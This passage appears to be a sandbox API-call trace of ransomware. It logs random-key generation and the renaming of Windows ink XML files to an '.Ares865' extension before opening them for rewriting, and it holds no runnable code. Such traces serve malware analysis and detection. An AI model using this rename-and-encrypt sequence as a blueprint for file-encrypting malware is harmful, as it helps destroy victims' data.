pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.509] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.519] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.520] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.520] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.521] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.Ares865") returned 69 [0076.521] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.ares865"), dwFlags=0x1) returned 1 [0076.523] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.523] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2592) returned 1 [0076.523] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.524] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.524] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.526] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.527] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.527] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.527] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.Ares865") returned 69 [0076.527] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.ares865"), dwFlags=0x1) returned 1 [0076.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.528] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2462) returned 1 [0076.528] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.529] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.529] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.531] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.532] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.532] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.532] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.Ares865") returned 69 [0076.533] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.ares865"), dwFlags=0x1) returned 1 [0076.534] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.534] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2436) returned 1 [0076.534] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.535] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.535] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.539] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.540] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.540] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.541] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.Ares865") returned 69 [0076.541] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.ares865"), dwFlags=0x1) returned 1 [0076.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.542] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2556) returned 1 [0076.542] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.543] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.543] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.545] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.545] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.545] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.546] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.Ares865") returned 69 [0076.546] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.ares865"), dwFlags=0x1) returned 1 [0076.549] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.549] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2514) returned 1 [0076.549] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.550] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.550] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.552] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.553] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.553] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.553] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.Ares865") returned 69 [0076.553] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.ares865"), dwFlags=0x1) returned 1 [0076.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.554] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2616) returned 1 [0076.554] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.555] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.555] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.557] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.558] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.558] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.558] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.Ares865") returned 68 [0076.558] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.ares865"), dwFlags=0x1) returned 1 [0076.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.560] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2578) returned 1 [0076.560] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.561] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.561] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.564] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.564] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.564] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.565] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.Ares865") returned 69 [0076.565] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.ares865"), dwFlags=0x1) returned 1 [0076.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.567] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3024) returned 1 [0076.568] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.568] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.568] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.570] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.571] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.571] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.571] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.Ares865") returned 69 [0076.571] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.ares865"), dwFlags=0x1) returned 1 [0076.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.577] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2658) returned 1 [0076.578] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.583] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.583] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.613] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.623] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.623] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.631] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.Ares865") returned 69 [0076.632] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.ares865"), dwFlags=0x1) returned 1 [0076.645] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.647] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2628) returned 1 [0076.649] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.669] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.669] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.671] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.672] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.672] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.673] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.Ares865") returned 69 [0076.673] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.ares865"), dwFlags=0x1) returned 1 [0076.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.674] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2652) returned 1 [0076.675] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.675] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.675] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.678] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.678] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.678] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.679] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.Ares865") returned 69 [0076.679] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.ares865"), dwFlags=0x1) returned 1 [0076.680] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.680] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2526) returned 1 [0076.680] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.681] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.681] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.683] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.684] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.684] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.685] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.Ares865") returned 69 [0076.685] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.ares865"), dwFlags=0x1) returned 1 [0076.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.686] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2522) returned 1 [0076.686] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.687] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.687] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.689] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.690] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.690] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.691] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.Ares865") returned 69 [0076.691] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.ares865"), dwFlags=0x1) returned 1 [0076.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.693] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2568) returned 1 [0076.693] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.694] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.694] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.696] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.697] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.697] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.698] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.Ares865") returned 69 [0076.698] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.ares865"), dwFlags=0x1) returned 1 [0076.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 